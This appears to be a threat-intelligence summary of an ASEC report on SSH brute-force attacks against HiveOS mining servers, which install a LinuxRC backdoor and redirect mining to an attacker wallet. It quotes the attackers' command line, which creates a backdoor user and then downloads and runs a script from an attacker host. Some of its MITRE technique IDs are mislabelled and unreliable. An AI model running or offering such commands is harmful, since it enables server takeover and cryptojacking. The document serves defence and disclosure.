Keypoints
- ASEC uses SSH-focused honeypots to monitor attacks on improperly managed Linux servers, notably HiveOS.
- Initial access is achieved via brute-force against exposed SSH services, after which attackers execute a downloaded Bash script named “run”.
- The “run” script creates a backdoor account, changes passwords, and overwrites authorized_keys to enable persistent SSH access.
- Attackers download and register a LinuxRC backdoor (“autofan” / autofan.service) and a mining configurator (“nvidia-conf” / overclock.service) as services.
- LinuxRC provides remote file operations, command execution, and reverse shell capabilities for persistent control.
- The attackers configure HiveOS to use GMiner and replace the miner wallet (wallet.conf) to mine Ravencoin (KawPow) to the attacker’s pool and wallet.
- Post-installation actions include deleting log files to hinder detection and maintaining access via SSH keys and service registration.
MITRE Techniques
- [T1078] Valid Accounts – Brute-force SSH access to exposed services: (‘scanned publicly exposed SSH services and attempted to log in through brute force attacks’).
- [T1203] Command and Scripting Interpreter – Use of Bash scripts to execute payloads: (‘downloads and executes a malicious Bash script named “run”‘).
- [T1053] Scheduled Task/Job – Registering malicious payloads as services for persistence: (‘register them as a service’).
- [T1068] Exploitation for Privilege Escalation – Exploiting weak SSH configuration to gain higher access: (‘targeted the improperly managed SSH service’ / ‘exploit weaknesses in SSH configurations to gain elevated privileges’).
- [T1070] Indicator Removal on Host – Deleting logs to evade detection: (‘it deletes multiple log files’).
- [T1003] Credential Dumping / Credential Access – Changing account passwords and overwriting SSH keys to retain access: (‘changes the passwords for the “hive” and “user” accounts’ / ‘overwrites the “authorized_keys” file’).
- [T1071] Application Layer Protocol – Using SSH as a command-and-control channel: (‘use SSH for command and control over the compromised system’).
- [T1041] Exfiltration Over C2 Channel – Potential data exfiltration over the established SSH connection: (‘may exfiltrate data using the established SSH connection’).
Indicators of Compromise
- [MD5 hashes] payload identification – 1453e39da61777e617ff2da815905c63, 2d24ab3191541c45a12bde89ea12478f, and 2 more hashes.
- [URLs] payload and script hosting – hxxp://are[.]cloudns[.]org:12300/hfs/run, hxxp://are[.]cloudns[.]org:12300/hfs/miners/autofan, and other hosting URLs (3 more items).
- [IP address] command/source host – 222[.]103[.]211[.]25 (associated with the hosting domain for payloads).
- [Filenames / service names] deployed files and services – /tmp/run, autofan and autofan.service, nvidia-conf and overclock.service, wallet.conf (miner configuration), and additional scripts.
A successful brute-force login to exposed SSH services is followed by the attacker adding a “hive” user and downloading a launcher script. The observed initial command sequence includes creating the user with a salted password and fetching the runner:
sudo useradd -p `openssl passwd -1 -salt ‘salt’ IB223lW2` hive -u 1000 -o -g user -G user; sudo wget hxxp://are.cloudns[.]org:12300/hfs/run -O /tmp/run; sudo dos2unix /tmp/run; sudo chmod 777 /tmp/run; sudo /bin/bash /tmp/run. The fetched “run” script then resets passwords for hive/user accounts and overwrites authorized_keys to install attacker-controlled SSH access.
The “run” script downloads two primary payload groups: a LinuxRC backdoor distributed as “autofan” with an accompanying autofan.service to register it as a system service, and a mining configurator “nvidia-conf” plus overclock.service to switch HiveOS’s miner configuration. LinuxRC (autofan) exposes commands for remote command execution (CMDSHELL/SHELL2), reverse shell (BACKDOOR), file browsing (EXPLORER), and file transfer (DOWNLOAD/UPLOAD), enabling full remote control beyond SSH access.
For cryptomining persistence, the attacker replaces the HiveOS miner wallet/config so GMiner (already present in HiveOS) mines KawPow (Ravencoin) to attacker-controlled endpoints; the injected wallet.conf specifies GMINER_ALGO=”kawpow” and a mining pool/port (e.g., kawpow.auto.nicehash[.]com:9200). After installing services and payloads, scripts remove multiple log files to hinder forensic analysis and maintain access via the new account and SSH key.
Read more: https://asec.ahnlab.com/en/83857/